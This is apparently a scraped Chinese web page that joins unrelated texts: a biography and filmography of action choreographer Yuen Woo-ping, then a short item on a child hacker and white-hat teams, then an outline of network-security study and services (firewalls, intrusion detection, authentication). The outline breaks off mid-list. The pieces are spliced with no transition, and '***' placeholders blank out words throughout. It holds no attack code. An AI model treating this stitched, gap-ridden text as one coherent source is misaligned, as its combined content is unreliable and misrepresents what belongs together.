袁和平 (Yuen Woo Ping,大眼)
[编辑本段]简 介
出生于武术世家的袁和平,1945年出生于广州,原籍北京,年轻时绰号“大眼”,如今已被尊称为“八爷”,香港著名电影动作指导、导演,是香港动作电影其中一个最成功和具影响力的人。父亲是电影史上首位武指袁小田,是京剧世家传人、香港艺坛著名演员兼武术教练,精通北派功夫。袁小田在50年代曾主演近百部描写中国历史上武林高手黄飞鸿的功夫电影。袁和平也参加演出。1970年任《疯狂杀手》武术指导而进入导演领域。之一部是《疯狂杀手》,而后为《饿虎狂龙》(1972)、《壁虎》(1972)、《荡寇滩》(1973)、《小杂种》(1973)等片担任武术指导。后为吴思远赏识,设计《鹰爪铁布衫》动作。1978年升为导演,独立执导《蛇拳》(蛇形刁手)、《醉拳》两部功夫喜剧,将功夫与杂耍逗趣糅在一起,大受欢迎,也让成龙一炮而红,获得巨大成功,成为闻名香港、东南亚地区和日本的著名功夫片导演。之后执导《南北醉拳》(1979),与洪金宝合作《林世荣》(1979)。80年代执导《奇门遁甲》(1982)、《霍元甲》(1982)、《笑太极》(1984)等。1985年导演时装动作喜剧《情逢敌手》,将流行霹雳舞与武术熔于一炉,创出新的娱乐效果。后为德宝公司拍摄《特警屠龙》(1988)、《皇家师姐Ⅳ直击证人》(1989)、《洗黑钱》(1990)等时装动作片。1992年与徐克合作《黄飞鸿Ⅱ男儿当自强》获第十二届香港金像奖更佳动作指导奖。随后又导演了《少年黄飞鸿之铁马骝》(1993),获第十三届香港金像更佳动作指导提名。《苏乞儿》(1993)、《太极张三丰》(1993)、《火云传奇》(1994)、《咏春》(1994,又名《红粉金刚》)、《功夫小子闯情关》(1996,又名《太极拳》)等,并为王晶的《黄飞鸿之铁鸡斗蜈蚣》(1993)、陈嘉上的《精武英雄》(1994)、李仁港的《黑侠》(1996)等设计动作。1999年应好莱坞之邀,为《黑客帝国》系列设计动作,引起全球轰动。随后又为昆汀·塔伦迪诺的两集《杀死比尔》、徐克的《蜀山传》(2001)、周星驰的《功夫》(2004)、冯德伦的《精武家庭》(2005)、于仁泰的《霍元甲》(2006)等做动作指导,皆获成功。袁和平还曾执导电视剧《太极宗师》、《新少林寺》等,并曾为央视《水浒传》设计动作。为电影《功夫之王》(2008)担任动作指导。
当年袁和平曾在模仿美国电影《金刚》的港片《猩猩王》中穿着厚热的戏装扮“猩猩王”,现在他则以美国影片“黑客”三部曲成为全球最炙手可热的动作指导。今昔对比,恍如隔梦,似乎难以置信,实际却是“大眼八爷”凭借多年的努力和超强的实力得成的正果。
初试锋芒:谐趣功夫片
袁和平出身武术世家,父亲袁小田本是京剧武丑,精擅北派武术。早在1939年,袁小田就开始担任香港电影的武打和替身演员,在这一行当算得上德高望重。袁小田育有七个儿女,袁和平排行老二,自幼便与其他几位手足袁祥仁、袁信义、袁日初、袁振威、袁龙驹一起随父亲习武,并被父亲带入电影圈。也曾与父亲一起参演过多部“黄飞鸿”电影。20岁时进入电影圈做龙虎武师及龙套演员,他在25岁时,首次为吴思远导演的《疯狂杀手》担任动作设计,之一次当上了武术指导,其时为1970年。在1978年,袁和平在吴思远的提携下开始导演工作,这一年便拍摄了蛇形刁手与醉拳两部功夫喜剧,在当时受到了广大的欢迎。
上世纪70年代正值香港功夫片大行其道,每年都有占港片产量半数以上的功夫片 *** 上映,堪称功夫片的黄金时代!由于曾经引领潮流的“黄飞鸿”老派功夫片(关德兴主演)的打斗套路已然落伍,当时功夫片的动作设计大多跟风李小龙的现代截拳飞脚,张彻、刘家良的清末少林功夫,以及楚原、唐佳的古装武侠打斗这三种模式。而模仿跟风的结果自然是粗制滥造、千篇一律,观众看得愈发无趣。加之许冠文兄弟的生活喜剧大受欢迎,对功夫片形成冲击,到得70年代末期,香港的功夫片创作不免陷入困境——也就在此时,袁和平开始声名鹊起,他对功夫片进行的创新改良,取得了影响深远的突破性成就。
1978年,在著名电影人吴思远的提携下,已为多部电影担任过动作设计的袁和平终于升做导演,并在一年之内开拍了《蛇形刁手》和《醉拳》两部功夫片。尽管这两部电影皆是顽劣少年跟随深藏不露的宗师高手学艺,最终艰难打败强敌的寻常情节,却被袁和平拍出新意。他先为《蛇形刁手》和《醉拳》定下功夫喜剧的基调,同时精心设计了活泼灵巧兼具杂耍游戏性的象形武术动作,突出了练功过程的趣味性,完全有别于之前的功夫片模式,令观众耳目一新。
《蛇形刁手》和《醉拳》上映后反响极佳,两部功夫喜剧的票房皆名列当年十大卖座影片,甚至打入日本市场。袁和平也因此一鸣惊人,成为香港电影界继刘家良、洪金宝之后第三位由动作指导升为导演的成功范例。另外,袁和平的这两部电影还捧红了曾是票房毒药的成龙,片中充满喜感活力的顽劣少年形象简直是为成龙量身订做,而经过十年戏校训练的成龙,对完成袁和平在练功过程中设计的高难度杂技动作自然驾轻就熟。如此天衣无缝的合作,想不成功都难。
《醉拳》之后,袁和平与成龙分道扬镳,这两位香港谐趣功夫片的开创者沿着各自的喜好方向继续将此类片种发扬光大。如果说成龙的《笑拳怪招》和《师弟出马》已经是突破常规的自由发挥,那么袁和平的《林世荣》与《勇者无惧》则是传统与创新的融合,也可以说是《醉拳》的延续。《醉拳》本是传统的“黄飞鸿”题材,只不过编导聪明的将原来严肃正统的中年“黄师傅”传奇改为调皮诙谐的青年“黄飞鸿”故事。待到《林世荣》和《勇者无惧》这两部同样“黄飞鸿”题材的电影中,虽然换回关德兴这个正宗“黄师傅”,但严肃之中已带有些喜剧色彩。况且黄师傅不再以主要角色出现,反倒以黄飞鸿的青年弟子经历作为情节主线,依旧是《醉拳》带有闯祸青年的诙谐故事配以最后搏命对打的激烈场面的套路。具体到动作方面,两部影片都做到了刚柔相济,不过《林世荣》是袁和平与洪金宝共同设计;《勇者无惧》却是袁家班的集体创作,但男主角仍是洪金宝、成龙的师弟元彪。
由于《林世荣》与《勇者无惧》的票房口碑不输《醉拳》,袁和平的功夫片导演地位当然更加稳固。
几度风雨:灵幻功夫片与时装动作片
说到对电影特技的接触运用,擅长拍真功夫的袁和平并非如很多人想的那样始自《黑客帝国》。事实上,袁和平在20年前便已开始将拳脚功夫与电影特技结合起来,搞出了港片的独特类型——“灵幻功夫片”。不过,当年八爷玩的不是电脑特技,而是包括烟雾、威亚、魔术、杂技在内的香港土法特技。
或许是受到1980年洪金宝自导自演的《鬼打鬼》的启发,袁和平于1982年也导演了灵幻功夫片《奇门遁甲》,而且走得更远,拍得更玄。《鬼打鬼》尚且有些现实生活的偷情捉 *** 节,结尾处的重头戏,鬼怪附体的打斗依旧以拳脚功夫的对决表现。待到袁和平的《奇门遁甲》中则完全是超现实的情节逻辑和神乎奇技的斗法比拼。易容杀人、地府报仇,呼风唤雨、剪纸化蝶,分明是一部魔幻传奇。看得出,袁和平对该片注入了极大心血,他从中国传统的民俗文化中汲取灵感,不仅设计了超乎寻常的杂技式肢体动作,而且运用了大量传统魔术手法,使《奇门遁甲》的人物造型、道具、布景以及打斗场面呈现出既恐怖又幽默的诡异风格,即便在当今香港电影中也称得上独树一帜。
《奇门遁甲》推出后大获成功,使得袁和平及袁家班倍受鼓舞,紧接着又拍了《天师撞邪》、《僵尸怕怕》、《阴阳奇兵》等灵幻功夫片,继续在各种稀奇古怪的神奇动作桥段设计方面下足气力。可惜这几部影片只以节奏奇观取巧,情节内容却简单粗糙,远及不上洪金宝的《人吓人》和《僵尸先生》等灵幻功夫片既有林正英、陈会毅对动作把关,又有黄炳耀、黄鹰等名编剧对故事情节精密编排,因此最终沦为 *** 之作,反响甚微,票房也愈来愈差。
眼见“灵幻功夫片”风光不再,回归民初功夫喜剧的《笑太极》又差强人意,袁和平经过一番审时度势,决定跟上时代潮流,改拍当年正大受欢迎的时装动作片,首部作品是1985年的《情逢敌手》。在这部反响不错的影片中,袁和平将流行的霹雳舞与传统的武术、杂技融合在一起,创出全新的动作娱乐效果。另外,值得注意的是,在这一阶段,被袁和平挖掘出的弟子甄子丹成为他时装动作片的更佳诠释者,从《情逢敌手》到《特警屠龙》、《皇家师姐之直击证人》,再至《洗黑钱》,甄子丹辅助袁和平设计了许多精彩之极的新奇现代打法,与八爷以前的功夫喜剧风格迥异。
尤其是 *** 动作片《洗黑钱》,故事情节固然简单乏味,但袁和平、甄子丹、袁祥仁、郭振锋(这四人如今都已闯入国际影坛)共同设计的打斗场面完全打破了传统功夫片的套路模式,融合现代格击与分解后的武术招式,既迅速敏捷、又拳拳到肉,动作潇洒、造型凌厉,同时甄子丹擅长的腿功亦发挥得淋漓尽致,堪称动作片影史的典范之作!
不过,尽管袁和平对时装动作打斗戏一如既往的用心创新,但始终难以重现当年拍功夫喜剧的辉煌。上世纪80年代后期最受观众欢迎的是成龙的时装动作片,那时他和成家班已经拿下四届香港金像奖更佳动作指导。相比之下,袁和平的动作设计不是不好,只是参与影片的整体质量平庸,浪费了八爷的才华。其实,无论做动作指导,还是做导演,当时的袁和平都缺乏一个可以从形式到内容全方位提升影片水准的合作者……
再次辉煌:90年代的武侠功夫片潮流
进入90年代,香港掀起了武侠功夫片的新一轮热潮,袁和平正好可以籍此大展所长。但八爷之所以能迎来个人事业的第二次高峰,还得益于找到了一个极富创造力的合作伙伴,亦是新派武侠功夫片热潮的始作俑者——徐克。
却说1991年,素以创新求变闻名的徐克准备重拍黄飞鸿故事。首集找来了刘家荣和袁祥仁、袁信义兄弟为影片设计动作招式。旧瓶装新酒的《黄飞鸿》上映后大获成功,票房狂收3000万,并令徐克获得香港金像奖更佳导演,袁祥仁三人荣获更佳动作指导奖项。翌年,徐克趁势推出续集《男儿当自强》,这次则只请袁和平一人担任动作指导。八爷果然不负重托,除了延续了之一部硬桥硬马的武术功夫外,他又加进了许多灵活的杂耍技巧,比如李连杰(饰黄飞鸿)与熊欣欣(饰九宫真人)在南天门需要掌握平衡的对打,还有柔身几转卸掉白绫的舒展动作等。至于影片最精彩的部分,黄飞鸿与纳兰元述(甄子丹饰)在狭窄空间中进行的棍斗,居然被袁和平设计出大开大合的动作效果,令人叹为观止。因此,袁和平获得当年香港金像奖更佳动作指导绝对是实至名归!
1993和1994两年是袁和平的创作旺盛期,他一口气担任了《黄飞鸿之铁鸡斗蜈蚣》、《少年黄飞鸿之铁马骝》、《太极张三丰》、《英雄豪杰苏乞儿》、《咏春》、《精武英雄》、《火云传奇》七部功夫片的动作指导及导演,努力做到部部有新意。而在与李连杰、甄子丹、杨紫琼等功夫明星合作时,八爷每次都是因人而异,按照每个人的特点量身订做。比如甄子丹的腿功好,就要注意发挥这个长处;杨紫琼是舞蹈演员出身,就要为她安排具有节奏感和柔韧性的动作;李连杰武术功底深厚,招式有板有眼,所以袁和平多为他设计潇洒、英武的动作套路。再者,还要因戏而变,比如在同是由李连杰主演的《铁鸡斗蜈蚣》、《太极张三丰》和《精武英雄》中,八爷就分别为李连杰编排了醉拳、太极拳和自由搏击三种风格迥异的功夫招数。而相对于当年成龙打的富于杂技性的诙谐醉拳,《铁鸡斗蜈蚣》中李连杰施展的则是拳拳到肉的硬醉拳。——由此而来,不难窥见袁和平对动作设计的创新求变精神。
在袁和平拍过的众多功夫片中,他自认最满意的作品是《少年黄飞鸿之铁马骝》。影片由徐克编剧、监制,又是八爷拿手的“黄飞鸿”题材,虽然讲述黄飞鸿的少年故事,但浓墨谱写的却是黄麒英父子的舐犊亲情,这在袁和平导演的作品中甚为少见。至于动作场面,袁和平则回归传统功夫片,在不停机的情况下拍摄更多连贯的真实动作,尤显暴烈 *** 。而在《男儿当自强》中用吊钢丝踢出的“无影腿”,在《铁马骝》中也以甄子丹的快腿真实再现。还有历史上“黄师傅”真正擅长的南派洪拳在该片中同样成为对敌的主要应用招式,而不是像李连杰的“黄飞鸿”系列那样乱用北派功夫。另外,即便是片尾那段用吊纲丝完成的在几近烧断的木桩上的生死对决,如果甄子丹、于荣光、任世官没有真正的武术功底,也很难完美的呈现出来。
对于《铁马骝》达到的水准,或许可用甄子丹的一句谦语表明:这是建立香港动作功夫片基本标准的电影,超过它的肯定都是好电影。言下之意,自然是暗夸《铁马骝》也是佳作了。而事实上,《铁马骝》当年上映时却是叫好不叫座,票房只收600多万港币,令袁和平、甄子丹大失所望。不过,是金子总会发光,只是早晚问题,2001年底《铁马骝》登陆美国,西方观众对该片表现的纯正中国传统功夫反映热烈,票房达到近3000万美金。——对于袁和平来说,这份迟到的肯定固然值得高兴,但也只是锦上添花而已,因为此时他已因《卧虎藏龙》和《黑客帝国》跃升为国际最知名的动作指导了。
袁和平在香港星光大道的手印及签名
享誉国际:《卧虎藏龙》和《黑客帝国》
20世纪90年代中期,盲目的跟风抄袭终于再次将香港的武侠功夫片逼入绝境。袁和平的电影事业也陷入低谷,由他导演的《虎猛威龙》、《功夫小子闯情关》和《街头杀手》全部遭遇票房惨败。袁和平清醒认识到在香港拍功夫电影已难有发展,于是及时转战内地,与张鑫炎合组公司拍摄了《太极宗师》、《新少林寺》、《小李飞刀》等功夫武侠电视剧集。其中尤以八爷担任动作指导的央视大戏《水浒传》影响最广,他设计的动作摒弃花哨的招式,以真实流畅见长,一扫以往内地此类剧目打斗老套、笨拙之风,深受观众欢迎。
虽然当时袁八爷沦落到拍电视剧的地步,但著作等身、虎威犹存,仅在西方就拥有大量的动作影迷,比如拍过《惊世狂花》的沃卓斯基兄弟就是袁和平电影的铁杆Fans。也正因如此,1998年沃卓兄弟拍摄《黑客帝国》时,自然会想到聘请袁和平担任该片的动作设计。袁和平对他们提出的“东方功夫+西方特技”动作理念非常感兴趣,而且正好借此机会打入好莱坞,当即应允加盟。
作为动作指导,袁和平要做的是完美体现导演沃卓兄弟的动作意念。他首先对基努-里维斯等明星进行体能和基本功训练,同时还要学习吊钢丝的技巧。两个月后演员开始尝试完成八爷设计的动作,比如嘉莉-安-摩斯空中定格的“鹰展翅”,基努里-维斯子弹时间的“铁板桥”等,都有十足的难度,所幸演员们都完成得非常精彩。另外,由于在虚拟世界可以出现任何动作功夫,因此袁和平也加进了中国观众最熟悉的李小龙和黄飞鸿的招牌造型,还有自己的成名作“醉拳”,颇具趣味。
1999年《黑客帝国》上映后,在全球引起轰动,票房口碑俱佳。不过,袁和平还来不及享受成功的喜悦,便一头扎进李安执导的武侠片《卧虎藏龙》剧组中。本来拍武侠片,对袁和平来说是小儿科,但面对素来以文艺片闻名的李安,八爷却不敢将他当做门外汉。事实上,李安对武打场面的构思极具想象力,比如夜间杨紫琼与章子怡的飞檐走壁,竹林周润发与章子怡的摇曳追逐等,都让袁和平绞尽脑汁。相比之下,倒是杨紫琼用数种冷兵器轮番大战章子怡的动作戏更容易些。2000年底《卧虎藏龙》在美国上映,取得了与《黑客帝国》同样巨大的商业成功,全球票房累计达数亿美金,更斩获四项奥斯卡奖。
其实,并不是每个观众都能理解《黑客帝国》和《卧虎藏龙》讲述的故事情节和表达的内涵境界,这当中有地域文化、种族阶层、个人情趣品位多方面的局限。但是,精彩的动作场面却可以超越这些局限,让任何正常的观众都为之激赏,甚至不去理会影片在讲什么。因此,身为动作指导的袁和平对于《黑客帝国》和《卧虎藏龙》的商业成功起着举足轻重的作用。而如今众多好莱坞片商争相找袁和平做动作指导甚至导演,更足以证明他的炙手可热程度。
(尾声)侠义八爷
年近花甲的袁八爷迎来了迄今为止个人事业的更高峰,不过他并没有被成功冲昏头脑,一味急功近利的乱拍,相反他的选择倒愈发从个人性情出发:好莱坞电影大 *** 要仔细挑选,慎重再慎重;但当周星驰的《功夫》临阵缺将、向他求助时,袁和平却二话不说,火速回国,即刻投入动作指导的工作,八爷的古道热肠可见一斑;再者,近来好友徐克每每开拍新片,他皆是招之即来,来之能战,从《蜀山》到《黑侠2》,徐克依旧在事业低谷徘徊,难得的是八爷的不离不弃……
[编辑本段]“八爷”的来由
袁和平并非排行第八,其外号“八爷”源自他的兄弟们取笑他为人啰唆,像个老人家,称他为“伯爷”(旧式粤语,指男性的“老人家”,“爷”在这里变调念阴平声),后来以讹传讹,一音之转,变成“八爷”。
[编辑本段]导演作品
霍元甲 (2006)
白雪公主和七武僧 Snow and the Seven (2006)
精武家庭 House of Fury (2005)
The Hands of Shang-Chi (2005)
铁猴子 (2001)
成龙经典-蛇形刁手She xing diao shou (2000)
黄飞鸿之铁鸡斗蜈蚣 Wong Fei-hung chi tit gai dau neung gung (2000)
初到贵地 Master of Disaster (1999)
太极拳 Tai Chi Boxer (1996)
虎猛威龙 The Red Wolf (1995)
咏春 Yong Chun (1994)
火云传奇 Fiery Romance (1994)
太极张三丰 The Tai-Chi Master (1993)
少年黄飞鸿之铁马骝 Siunin Wong Fei-hung tsi titmalau (1993)
冷面狙击手 Tiger Cage 3 (1991)
皇家师姐4直击证人 Huang jia shi jie zhi IV: Zhi ji zheng ren (1989)
特警屠龙 Tiger Cage (1988)
笑太极 Drunken Tai-Chi (1984)
奇门盾甲 Qi men dun jia (1982)
勇者无惧 Dreadnaught (1981)
林世荣 Magnificent Butcher (1979)
醉拳 Jui kuen (1978)
袁和平编剧作品
笑太极 Drunken Tai-Chi (1984)
奇门盾甲 Qi men dun jia (1982)
[编辑本段]担任动作指导的作品
《功夫之王》(2008)
《霍元甲》(2006)
《精武家庭》(2004)
《功夫》(2004)
《杀死比尔2》(2004)
《黑客帝国2重装上阵》(2003)
《黑客帝国3矩阵革命》(2003)
《杀死比尔》(2003)
《蜀山正传》(2000)
《卧虎藏龙》(1999)
《黑客帝国》(1999)
《小李飞刀》(1998)
《水浒》(1998)
《功夫小子闯情关》(1996)
《黑侠》(1996)
《铁马骝II之街头杀手》(1995)
《虎猛威龙》(1995)
《红粉金刚》(1994)
《精武英雄》(1994)
《太极张三丰》(1993)
《黄飞鸿之铁鸡斗蜈蚣》(1993)
《少年黄飞鸿之铁马骝》(1993)
《黄飞鸿II男儿当自强》(1992)
《双龙会》(1992)
《皇家师姐IV直击证人》(1989)
《阴阳奇兵》(1986)
《鬼马天师》(1983)
《奇门遁甲》(1982)
《死亡塔》(1981)
《醉拳》(1979)
《南北醉拳》(1979)
《林世荣》(1979)
《蛇行刁手》(1978)
《太极气功》(1978)
《鹰爪铁布衫》(1977)
《神腿铁扇功》(1977)
《南拳北腿斗金狐》(1977)
《猩猩王》("猩猩王"替身)?
《破戒》(1977)?
《眨眼功夫》(1977)?
《狼狈为奸》(1974)
《猛虎斗狂龙》(1974)
《石破天惊》(1973)
《除霸》(1973)
《荡寇滩》(1972)
《硬汉》(1972)
[编辑本段]演员作品
《跑路威龙》 (2004)
《走佬威龙》(1993)
《妖兽都市/邪恶城市》(1992)
《冷面狙击手》(1991)
《机Boy小子之真假威龙》 Game Kids (1991)
《一本漫画闯天涯》(1990)
《龙蛇争霸》(1989)
《特警屠龙》(1988)
《群龙夺宝》(1988)
《东方秃鹰》(1987)
《情逢敌手》(1985)
《圣诞快乐》(1984)
《天师撞邪》(1982)
《醉拳》(1979)
《太极气功》(1979)
《南拳北腿斗金狐》(1977)
《猩猩王》(1977 "猩猩王"替身)?
《死囚》(1976)?
《油鬼子》(1976)
《中国超人》(1975)
《女金刚斗狂龙女 》(1975)
《刺马》(1973)
《小杂种》(1973)
《大杀手》(1972)
《恶客》(1972)
《荡寇滩》(1972)
《硬汉》(1972)
《壁虎》(1972)
《报仇》(1970)
《十二金牌》(1970)
《十三太保》(1970)
《大罗剑侠》(1970)
《龙虎门》(1970)
《小煞星》(1970)
《天狼寨》 (1968)
《断肠剑》(1967)
《独臂刀》(1967)
《文素臣》(1966)
《边城三侠》(1966)
《江湖奇侠》(1965)
中国8岁小黑客。他太聪明了学会了很多操作系统的知识,但是没有教他什么是正确的,什么是错误的道德观。然后不写作业黑掉学校的答题系统,被学校批评教育。
他现在和很多孩子一样读书学习,准备着各种考试,而且他也希望自己可以考一所好大学继续学习计算机。
如果说中国有没有黑客,肯定有,但是强行黑入别人的计算机系统是犯法的。我国有很多知名的白帽黑客,简单来说白帽子是利用自己的技术做好事,他们经常被计算机公司聘请来监测自己的系统安全,跟 *** 安全工程师的性质有些类似。
我国最知名的白帽安全团队是Keen Team,最近也有一个由他们主办的活动在举办。GeekPwn全球极客嘉年华活动本月在北京举行,会有很多极客圈中的知名人士出席,并且活动中也会有很多顶级智能产品的展示和破拆环节,如果你对这些技术相关问题有兴趣,可以自己参与一下这个活动,看看这些大神谁的技术更好~
基础:
如何去学习
·要有学习目标
·要有学习计划
·要有正确的心态
·有很强的自学能力
学习目标
·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家? *** 黑客等)
·2.自己目前的水平和能力有多高
·能简单操作windows2000
·能简单配置windows2000的一些服务
·能熟练的配置Windows2000的各种服务
·能熟练配置win2000和各种 *** 设备联网
·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
·能配置cicso,huawei,3com,朗迅等 *** 设备
·会简单编写C/C++,Delphi,Java,PB,VB,Perl
·能简单编写Asp,Php,Cgi和script,shell脚本
·3.必须学会不相信态度,尊重各种各样的能力
·不要为那些装模做样的人浪费时间
·尊重别人的能力,
·会享受提高自己能力的乐趣.
·在知道了自己的水平和能力之后就要开始自己的目标了
·--------安全专家
·--------黑客
·--------高级程序员
·黑客是建设 *** ,不是破坏 *** , 破坏者是骇客;
·黑客有入侵的技术,但是他们是维护 *** 的,所以和安全专家是差不多的;
·因为懂得如何入侵才知道如何维护
·因为懂得如何维护才更要了解如何入侵
·这是 黑客与安全专家的联系
·但,他们都是在会编程的基础上成长的!
·下面我们开始我们的学习计划!
学习计划
有了学习计划才能更有效的学习
安全学习计划
不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s
erver,这是我们培训的更低标准,你对英语有一定的了解也是必不可少
最基础
·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2
000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件
,如果有 *** 适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用
域的定义
·b.知道如何开,关机 知道注销的用处
·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具里面各个组件的定义
·e.学会应用命令提示符cmd(dos)
·f.知道计算机管理里面的各个选项的不通
·g.知道win2000强大的 *** 管理功能
·h.能非常熟练的操作win2000
·i.知道IP地址,子网掩码,网关和MAC的区别
进阶
·A.配置IIS,知道各个选项的作用
·B.配置DNS,DHCP
·C.配置主控制域,辅助域
·D.配置DFS
·E.配置路由和远程访问
·F.配置安全策略IPSEC
·G.配置service(服务)
·H.配置磁盘管理,磁盘分额
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安装与简单配置
·K.交换机的安装与简单配置
·L.常见的VPN,VLAN,NAT配置
·M.配置常见的企业级防火墙
·N.配置常见的企业级防病毒软件
高级
·之前我们学到的是任何一个想成为 *** 安全专家和黑客基本知识中的一部分
·你作到了吗??
·如果你做到了,足以找到一份很不错的工作!
配置负载均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三层交换 *** ·
·配置各种复杂的 *** 环境
·能策划一个非常完整的 *** 方案 ·
·能独自组建一个大型的企业级 *** ·
·能迅速解决 *** 中出现的各种疑难问题
结束
·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标!
·可以找到一份非常好的工作
·不会再因为给女朋友买不起玫瑰而发愁了!
安全:
导读
·系统安全服务(SYSTEM)
·防火墙系统(FIREWALL)
·入侵检测(IDS)
·身份验证(CA)
·网站监控和恢复(WEBSITE)
·安全电子商务(E-BUSINESS)
·安全电子邮件(E-MAIL)
·安全办公自动化(OA)
·Internet访问和监控(AC)
·病毒防范(VIRUS)
·虚拟局域网(VPN)
系统安全服务
·系统安全管理
·系统安全评估
·系统安全加固
·系统安全维护
·安全技能学习
系统安全管理
·信息系统安全策略
·信息系统管理员安全手册
·信息系统用户安全手册
·紧急事件处理流程
系统安全评估
1、系统整体安全分析
· 分析用户的 *** 拓扑结构,以找出其结构性及 *** 配置上存在的安全隐患。
· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。
· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用
2、主机系统安全检测
· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。
· 对于特定的系统,采用特别的工具进行安全扫描。
· 根据经验,对系统存在的漏洞进行综合分析。
· 给出系统安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的危险。
· 给出修复安全漏洞的建议
3、 *** 设备安全检测
· 通过对 *** 进行安全扫描,以发现 *** 设备的安全漏洞。
· 根据经验,对 *** 设备存在的漏洞进行综合析。
· 给出 *** 设备安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的险。
· 给出修复安全漏洞的建议。
安全系统加固
·为用户系统打最新安全补丁程序。
·为用户修复系统、 *** 中的安全漏洞。
·为用户去掉不必要的服务和应用系统。
·为用户系统设置用户权限访问策略。
·为用户系统设置文件和目录访问策略。
·针对用户系统应用进行相应的安全处理。
安全系统维护
·防火墙系统维护,安全日志分析
·IDS系统维护,安全日志分析
·VPN系统维护,安全日志分析
·认证系统维护,安全日志分析
·服务器、主机系统,安全日志分析
·其它各类安全设施维护及日志分析
安全技能培训
· *** 安全基础知识
· *** 攻击手段演示和防范措施
·防火墙的原理和使用
·VPN的原理和使用
·漏洞扫描工具的原理和使用
·IDS(入侵检测系统)的原理和使用
·身份认证系统的原理和使用
·防病毒产品的原理和使用
·系统管理员安全培训
·一般用户安全培训
防火墙系统
·防火墙的定义
·防火墙的分类
·包过滤防火墙
·应用网关防火墙
·状态检测防火墙
·一般企业防火墙配置
· *** 机构防火墙配置
·涉密 *** 保密网关配置
·高可用性和负载均衡防火墙系统
·高速防火墙系统
防火墙的定义
·用以连接不同信任级别 *** 的设备。
·用来根据制定的安全规则对 *** 间的通信进行控制
防火墙的分类
·包过滤 (Packet Filters)
·应用网关 (Application Gateways)
·状态检测(Stateful Inspection)
包过滤防火墙
·包 过 滤 技 术
·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网
络层进行包检查与应用无关。
· 优 点
· 具有良好的性能和可伸缩性。
· 缺点
· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。
应用网关防火墙
·应用网关技术
·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应
用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。
· 优点
· 安全性比较高。
· 缺点
· 1、该 *** 对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从
防火墙系统到服务器,这会严重影响性能。
· 2、防火墙网关暴露在攻击者之中。
· 3、对每一个 *** 需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持
新应用方面存在问题。
检测状态防火墙
· 属第三代防火墙技术,克服了以上两种 *** 的缺点,引入了OSI全七层监测能力,同时
又能保持 Client/Server的体系结构,也即对用户访问是透明的。
· 防火墙能保护、限制其他用户对防火墙网关本身的访问。
· 状态检测技术在 *** 层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以
从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维
持这些信息以提供后继连接的可能性预测。该 *** 能提供高安全性、高性能和扩展性、高伸
缩性的解决方案。
入侵检测系统
·处理攻击时遇到的典型问题
·解决入侵的 *** 和手段
·基于 *** 的入侵检测
·基于主机的入侵检测
·入侵检测系统典型配置
处理攻击时遇到的问题
·获得的信息不足
·不知到 *** 上发生了什么事。
·无法判定系统是否已经被入侵。
·信息不准确
·人员少
·没有足够的人员维护管理。
·缺乏规范的处理程序
·发现攻击时如何反应?
·下一步该如何处理?
解决入侵的 *** 和手段
·采用入侵实时入侵监控系统(IDS)
·对系统、 *** 中发生的事件进行实时监控。
·当发生入侵事件时能即时反应。
·对入侵事件进行详细记录并跟踪。
基于主机的入侵检测
·软件模块安装在包含有重要数据的主机上
·监视操作系统的日志以发现攻击的特征。
·监视 *** 所处主机上的所有进程和用户.
·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等
。
·当新的日志产生时,为了减小对CPU的影响, *** 程序暂时中断。
基于 *** 的入侵检测
·软件安装在专门的主机上,放置于关键的网段
·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。
·分析数据包以判断是否有黑客攻击。
·监视网段上的所有数据。
·对 *** 的流量无任何影响。
·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻击。
身份认证系统
·用户身份认证的 ***
·不同认证 *** 的安全级别
·用户身份认证的常用方式
·解决问题的 ***
·目前比较成熟的双因素认证 ***
用户身份验证
·你知道的一些东西
· 密码, 身份证号,生日
·你有的一些东西
· 磁卡, 智能卡,令牌, 钥匙
·你独有的一些东西
· 指纹,声音,视网膜
密码是不安全的
·可以破解密码的工具太多
·大多密码在 *** 中是明文传输的
·密码可以 *** 离线时被窥测
·密码和文件从PC和服务器上被转移了
·好记的密码容易被猜到,不易猜测的密码又太难记
解决 ***
·使用混合的工具:如IC卡+PIN
网站监控与恢复系统
·典型的Web服务器应用
·Web服务器存在的安全问题
·网站安全解决 ***
典型web服务器应用
·Internet--路由器--防火墙--web站点
· |
· |
· 内部网
·所有的放在防火墙后面
Web服务器存在的安全问题
· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏
洞成为了网站被黑的主要问题。
· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.)
· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。
网站安全
·采用Web服务器监控与恢复系统
·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。
电子商务安全系统
·典型的电子商务应用
·电子商务中存在的安全问题
·电子商务的安全解决 ***
·实时数据交换系统
典型电子商务应用
·Internet---防火墙---Web服务器
